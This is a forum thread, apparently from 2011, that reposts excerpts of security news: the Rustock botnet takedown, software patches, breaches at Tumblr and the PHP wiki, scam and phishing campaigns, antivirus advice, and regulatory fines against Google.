21 total posts
Homegrown: Rustock Botnet Fed by U.S. Firms
Aaron Wendel opened the doors of his business to some unexpected visitors on the morning of Mar. 16, 2011. The chief technology officer of Kansas City based hosting provider Wholesale Internet found that two U.S. marshals, a pair of computer forensics experts and a Microsoft lawyer had come calling, armed with papers allowing them to enter the facility and to commandeer computer hard drives and portions of the hosting firm's network. Anyone attempting to interfere would be subject to arrest and prosecution.
Weeks earlier, Microsoft had convinced a federal judge (PDF) to let the software giant seize control of server hard drives and reroute Internet addresses as part of a carefully timed takedown of the Rustock botnet, which had long reigned as the world's most active spam-spewing crime machine.
In tandem with the visit to Wholesale Internet, Microsoft employees and U.S. marshals were serving similar orders at several other hosting providers at locations around country. Microsoft's plan of attack - which it spent about six months hatching with the help of a tightly knit group of industry and academic partners - was to stun the Rustock botnet, by disconnecting more than 100 control servers that the botnet was using to communicate with hundreds of thousands of infected Windows PCs.
Continued : https://krebsonsecurity.com/2011/03/homegrown-rustock-botnet-fed-by-u-s-firms/
Adobe releases Flash 10.2 for Android,
.. patches vulnerabilities
Adobe has released version 10.2 of its Flash Player for Android. The latest update brings support for devices with multi-core processors, such as the dual-core Motorola Atrix, and includes several performance enhancements for viewing video and interactive content.
Deeper integration with the Android browser rendering engine and support for hardware accelerated video rendering for H.264 have been added for devices running version 3.0 of Android "Honeycomb" - the developers note that the release is "initially a beta" for Android 3.0 and that the 3.0.1 system update is required. This Android version of Flash also addresses a number of security vulnerabilities which were fixed in version 10.2.152.26 of its desktop counterpart last month.
Continued : http://www.h-online.com/security/news/item/Adobe-releases-Flash-10-2-for-Android-patches-vulnerabilities-1211560.html
Outdated Computer Definition Renders WiFi Hacking Legal..
.. in the Netherlands
The definition of computers as specified in Dutch computer intrusion legislation has led to the acquittal of a defendant charged with breaking into a protected WiFi network.
The controversial verdict [Google translation] was handed down earlier this month by a Hague court in the case of a Maerlant College graduate who announced his intention to shoot people at his former school online.
The announcement was posted, allegedly as a joke, on the notorious website 4chan.org, a regular source for pranks and questionable Internet humor.
However, because it came two days after a school shooting in Germany, the threat was taken very seriously by some members of the image board who notified the college.
In addition to the criminal offense related to the threat itself, the student was also charged with computer intrusion because he made the announcement from a wireless network he hacked into.
The judge ordered the defendant to 120 hours of community service for making threats against human life, but acquitted him on the computer intrusion charges.
Continued : http://news.softpedia.com/news/Outdated-Computer-Definition-Renders-WiFi-Hacking-Legal-in-the-Netherlands-190551.shtml
Tumblr blames 'human error' for weekend security lapse
Tumblr has downplayed the severity of a security breach that may have exposed users' personal information including passwords and server IP addresses.
Popular blogging service Tumblr has cited "human error" as the cause behind a security glitch that may have revealed users' passwords, API keys, IP addresses and other personal data.
The alarm was sounded Saturday morning via Twitter. "OMG?The Tumbeasts are spitting out passwords!," the tweet read. The news quickly spread, with armchair hackers taking to forums to debate the extent and cause of the glitch. As it turns out, a PHP coding error was likely to blame for 748 lines of information being made visible.
Tumblr responded quickly to fix the problem and followed up with an official statement posted about five hours later. Here's what Tumblr had to say for itself:
Continued : http://www.digitaltrends.com/computing/tumblr-blames-human-error-for-weekend-security-lapse/
ICANN Approves .xxx Top-level Domain
The adult entertainment industry now has a home on the Internet: It's called .xxx.
The group that manages the Internet's top-level domains -- the .com, .org and .net that we all type at the end of e-mail messages and Web addresses -- said Friday that it will establish a .xxx domain, a move that it hopes will add a measure of predictability and security to the wild world of Internet websites. The Internet Corporation for Assigned Names and Numbers (ICANN) signed off on the process at a meeting in San Francisco this week.
Pornography is often used to lure Web surfers to dangerous or fraudulent sites. By regulating .xxx, ICANN hopes to make things better.
Anyone who wants to register a .xxx domain will first have to go through an application process that's approved by the International Foundation for Online Responsibility. This procedure is intended to ensure that .xxx domains don't engage in fraud, child pornography and other practices. At the same time, having a domain set aside specifically for adult websites would make it easier for users to block such sites from their browsing experience.
The move gives consumers "reassurance they are more protected from the risk of viruses, identity theft, credit card fraud and inadvertent exposure to child abuse images," ICANN said Friday in a statement announcing the decision.
Continued : http://www.pcworld.com/businesscenter/article/222609/icann_approves_xxx_toplevel_domain.html
Also: It's official: ICANN approves .xxx
CSIS expert list worst cyber security breaches since Jan '10
"CSIS expert lists worst cyber security breaches since January 2010"
According to Bank Info Security, testimony was given before the House Homeland Security Committee last week by James Lewis, senior fellow at the Center for Strategic and International Studies (CSIS).
Lewis's testimony included a list of serious security incidents that have taken place since January 2010. This list is reproduced below, with thanks to Bank Info Security.
Lewis is reported to have stated that the list "is not a record of success". He added "Whatever we are doing is not working...While individual government agencies have made strenuous efforts to improve our cyberdefenses, as a nation, despite all the talk, we are still not serious about cybersecurity."
This looks really rather damning of today's security infrastructure. But, I can't help but wonder how many cyber attacks weren't successful, thanks to the security that is place today? While I would agree that no one should rest on their laurels when it comes to security, I also know that there is no silver bullet.
I wonder if Lewis will also be providing advice on what needs to be done to help better secure against attacks. No one wants to be a victim, and most companies out there are doing what they can to stave off attacks.
Continued : http://nakedsecurity.sophos.com/2011/03/21/worst-security-breaches-2010/
Yet another malicious Facebook app:"Father crashes and dies"
Over the weekend, a lot of Facebook users started receiving malicious chat messages from their friends that looked like this: [Screenshot]
"Father crashes and dies because of THIS message posted on his daughters profile wall!" - followed by a shortened URL (using the bit . ly URL shortening services). The missing apostrophe in the word "daughter's" - i.e. "daughter's profile wall" - could be a clue that the message is not genuine, or at least that the author is not a native English speaker, but let's take a look at what would happen to a user who falls for this social engineering trick. [Screenshot]
Once clicked, the link takes the innocent user through a chain of redirections which ends up with a malicious Facebook app showing up on the screen and requesting several permissions.
Continued : http://www.securelist.com/en/blog/6115/Yet_another_malicious_Facebook_app_Father_crashes_and_dies
Japan Quake Spam (II)
From the Kaspersky Labs Weblog:
As was predicted by many, email scams soliciting donations for Japan are appearing in user's inboxes. We took a closer look at one of these messages and identified the following details: [Screenshot]
This email was apparently sent from an IP address in Canada via a mail server in Spain. The "From" and "Reply To" fields show a Japanese mail address and are most probably spoofed, while the message body mentions "Sasiki Nakatawo", a very uncommon, if not totally fictitious name, as the recipient of funds sent by Western Union money transfers. Potential victims are then requested to send their data and Money Transfer Control Number to a mail address in Hong Kong. By the way, the character setting of the mailer used to compose the message was set to "Windows-1251" (Cyrillic).
As we can see, there are a number of different locations around the world linked to this scheme. However, Kaspersky Lab's mail filtering products put this kind of stuff where it really belongs - the SPAM folder.
So You Got an AV Alert. Now What?
From SANS Internet Storm Center:
What do you do when you receive an antivirus alert on your home system?
You're checking your mail in the morning before heading to work, you click on a link sent to you by a friend and your AV throws up an alert. What do you do next?
Is it time to start from scratch and rebuild the system?
In that particular scenario, probably not. The antivirus was likely successful in thwarting the attempt to compromise your system. You can most likely get away with booting up in safe mode (we're talking about windows here not your smartphone) updating signatures and running a full scan. A quick look at autoruns (http://technet.microsoft.com/en-us/sysinternals/bb963902) or hijackthis (http://free.antivirus.com/hijackthis/) output would also be a sound step-- in fact, you should do that before you have an alert, just to get a baseline.
Then look into how you were exposed and report that appropriately.
When is the Worst Time to Get an Alert?
Having an alert pop-up in the middle of your Internet activities is one thing. Yet it's worse to receive alerts right after the signatures have been updated. Now you don't have much information on how long you've been compromised, and the odds that the chain-of-compromise (http://isc.sans.edu/diary.html?storyid=9880) was complete is much larger.
This is when it's time to have a serious discussion with yourself about rebuilding your system.
What Does that Alert Tell You Anyway?
Continued : http://isc.sans.edu/diary.html?storyid=10561
Firefox 4 slips out before official launch
Mozilla has quietly released Firefox 4 in advance of an official announcement.
The popular browser's fourth incarnation is available for download now in Linux, Mac OSX and Windows versions, a few weeks late for its planned February launch.
The downloads, which range from around 12MB for Linux and Windows up to a suspiciously bloated 26MB for the Mac version are well hidden within the Mozilla Foundation's web site with the main download page still defaulting to version 3.6.
We've been fiddling with the latest iteration for just a few minutes on our Mac Pro and everything seems pretty stable so far.
There have been some minor tweaks to the GUI with Chrome-like tabs now appearing above the main browser bar, but it's the refinements under the hood which should see web wanderers flocking to Mozilla's open source offering.
Improved HTML5 and CSS support should make those complex pages look even prettier and the addition of WebM support will allow HD video to be viewed in a browser window.
WebSocket support will allow developers to build online games and applications whilst indexed DM allows web apps to store data on your home system allowing products like Gmail to work even if you don't have an Internet connection.
Continued : http://www.thinq.co.uk/2011/3/21/firefox-4-slips-out-official-launch/
Related : Mozilla issues second Firefox 4 release candidate
Google blames China for Gmail service disruptions
It seems that the active exploitation of the MHTML vulnerability that Google's Security Team reported on earlier this month has a lot to do with recent attempts by the Chinese government to stem its own online revolution movement without appearing to be doing so.
At the time, the developers didn't point the finger towards the Chinese government but simply said that the attacks against their clients appear to be politically motivated. But Google has now decided to speak up and clear the air regarding the recent difficulties that Chinese customers and advertisers have been having with the Gmail service.
"Relating to Google there is no issue on our side. We have checked extensively. This is a government blockage carefully designed to look like the problem is with Gmail," stated Google. China, as usual, did not comment on the accusations.
Continued : http://www.net-security.org/secworld.php?id=10768
PHP developer wiki server hacked
According to the development team, access details for a number of accounts were stolen during a hack of the PHP developer wiki server wiki.php.net. Initial investigations have found that no other servers were compromised, but there was concern that the PHP source code might have been modified, as the stolen access data also provides access to the PHP repository.
The developers report that they therefore carried out a detailed code audit and checked every code commit in the subversion repository since version 5.3.5. According to a brief statement on www.php.net, no indication that changes had been made has been detected. The hack exploited a vulnerability in the CMS (DokuWiki), and unknown perpetrators were then able to escalate their privileges by use of a Linux root exploit.
The affected system has been wiped and all developers with access to the repository will be required to change their passwords. wiki.php.net was not accessible last Friday, and French security services provider Vupen spread rumours on Twitter that PHP could contain a backdoor. In a tweet which has since been deleted, Vupen linked to the website of a Chinese hacker who claimed to have modified code in the PHP repository. Rather than having inserted a backdoor, however, the intruder merely added the name 'Wolegequ Gelivable' to the credits in one file.
Continued : http://www.h-online.com/security/news/item/PHP-developer-wiki-server-hacked-1211874.html
A Stark Message to Cybercriminals: You Are Not Invisible,
.. You Are Not Beyond the Law
From TrendLabs Malware Blog:
Around the world, every day, security researchers study the activities, behaviors, forum communications, and networks of cybercriminals in an effort to make the world safe for the exchange of digital information.
In addition to preventing attacks, we gather and share intelligence with the appropriate industry anti-cybercrime groups and law enforcement authorities.
We've been tracking for one particular criminal who we'll call Mr. L for some time now. He's been preying on innocent users, primarily from Chile and Mexico, and according to our latest findings, he is still up to his old tricks of data and monetary theft. Just last week, we discovered an active command-and-control (C&C) server plus other criminal tools, including one based on a customized version of the CrimePack Exploit Pack, a practice that this criminal has carried out with his previous botnets.
We've already shared our findings with our law enforcement contacts but wanted you to also be aware, on your toes, and on the lookout for suspect email messages and other events.
So what do we know so far?
In September 2010, we published an in-depth research paper (pdf) that discussed the technical aspect of this particular criminals' botnets and toolkits.
The first botnet Trend Micro identified was the Tequila botnet. Then came the Mariachi botnet and the Alebrije and Mehika Twitter botnets. These botnets are collectively known as the Botnet PHP family.
Continued : http://blog.trendmicro.com/a-stark-message-to-cybercriminals-you-are-not-invisible-you-are-not-beyond-the-law/
An interesting article.
Thanks for that Carol.
It seems these cybercriminals are not as anonymous as they might have hoped.
Roundhouse Kick Time
From the F-Secure Weblog:
Chuck Norris kicks ass. We all know that. Malware authors know this too.
In fact, we've seen multiple worms and trojans over the years that make references to Chuck Norris. Probably the best example is the Chuck Norris Router Worm from last year.
While browsing through incoming malware, we noticed this little fellow
(md5 66b06adc178d17a7b42301e845eed84d). A botnet client, capable of taking over the computer and allowing full remote access to to infected system.
As usual, it requires a server to connect to. Name of the server? chucknorris.zapto.org. The bot also registers itself in registry under hkcu\software\chuck norris. We detect it as Backdoor:W32/Spyrat.D. Here's a description.
We looked this a bit deeper and it turns out to be generated with a tool called "CyberGate". Here's what the CyberGate control panel looks like. [Screenshot]
BlackBerry Protect now available in Europe
Private users can now protect their Blackberry smartphones in the same way that corporate users do using the BlackBerry Enterprise Server. The Canadian BlackBerry maker Research in Motion (RIM) is now providing to European customers the BlackBerry Protect application, previously only available to customers in the US. The free service includes client software for the BlackBerry and a web application.
After installing the BlackBerry Protect client the user needs to register for the service using the BlackBerry-ID that they use for BlackBerry App World. The software can then back up contacts, calendar, tasks, notes, bookmarks, and SMS messages. To save on data usage, the user can request that backups only occur if a Wi-Fi connection is available. The application also allows the data be restored to the original smartphone or to a new BlackBerry device.
A user who has lost a BlackBerry phone can also use the system to track that phone in order to try and retrieve it, with the phone's location being shown on a map in a web application. The phone can also be locked and loaded with a message for anybody who might find it, and be made to attract attention by ringing loudly for a whole minute, even if it is set to mute. If all this fails to retrieve the device, all its data can then be deleted remotely.
Paypal gets hit with a sophisticated phishing attack
"Able to bypass security browser"
ONLINE PAYMENT SERVICE Paypal has been the victim of a sophisticated phishing attack, according to the US Computer Emergency Readiness Team (US-CERT).
The attack, which is also being used to target Bank of America, Lloyds and TSB, is sent as part of an HTML attachment with unsolicited emails claiming to be legitimate.
The key difference between this attack and similar phishing attempts is that it locally stores the phishing webpage, rather than redirecting the user to a specific URL, which can be caught by anti-phishing measures built into many popular web browsers. Storing the website locally allows the attack to completely bypass browsers' anti-phishing defences.
US-CERT recommends that users be extra cautious online, particularly with personal information. It suggests that users should not open links and attachments in unsolicited emails, and should also attempt to verify that the email is legitimate by contacting the organisation in question or logging in directly through official websites only.
Google cops €100K French spank in Street View slurp
"Google cops €100k French spank in Street View slurp outrage"
French privacy watchdogs have hit Google with its very first fine for allowing its Street View cars to snoop on citizens' Wi-Fi data.
The search giant must pay a €100,000 (£87,114) fine for improperly gathering and storing data for its Street View application.
The privacy regulator CNIL (Commission nationale de l'informatique et des libertes) said it had carried out spot checks to see if Street View was following French law.
The regulator said: "These inspections revealed various violations such as collecting Wi-Fi data without the knowledge of those concerned and the capture of data described as 'content' (IDs, passwords, login details, email exchanges)."
The regulator asked Google to sort things out in May 2010. It was fined for failing to react in a timely manner.
France also accused Google of already using the data collected to improve its geo-location database and "acquire a dominant position in the field..."
Continued : http://www.theregister.co.uk/2011/03/21/google_street_view_fine/
France hands Google record fine over Snoop View
France hits Google with a €100,000 fine over Street View
US man arrested in hacker stock fraud scheme
US authorities Monday arrested and charged a Texas man accused of masterminding a scheme using a Russian hacker and an email spam campaign to pump up the value of fledgling companies, the Justice Department said.
Christopher Rad, 42, of Cedar Park, Texas, was arrested by FBI agents on a federal indictment charging him with one count of conspiracy to commit securities fraud and transmit commercial email messages with fraudulent information.
The scheme employed hackers, including at least one in Russia, to distribute computer viruses to infect computers around the world and create so-called "botnet" computers that were used to manipulate stocks, a Justice Department statement said.
"In addition to relying on unsuspecting investors to buy into the spam promotions, the hackers also hacked into the brokerage accounts of third parties, liquidated the stocks in those accounts, and then used those accounts to purchase shares of the manipulated stocks," the statement said.
"This created trading activity in the manipulated stocks and increased the volume of shares being traded, further creating an impression that the manipulated stocks were worth purchasing."
Continued : http://news.yahoo.com/s/afp/20110321/pl_afp/usitcrimemarkets
Also: Man Charged With Hiring Pump-and-dump Spam Botnet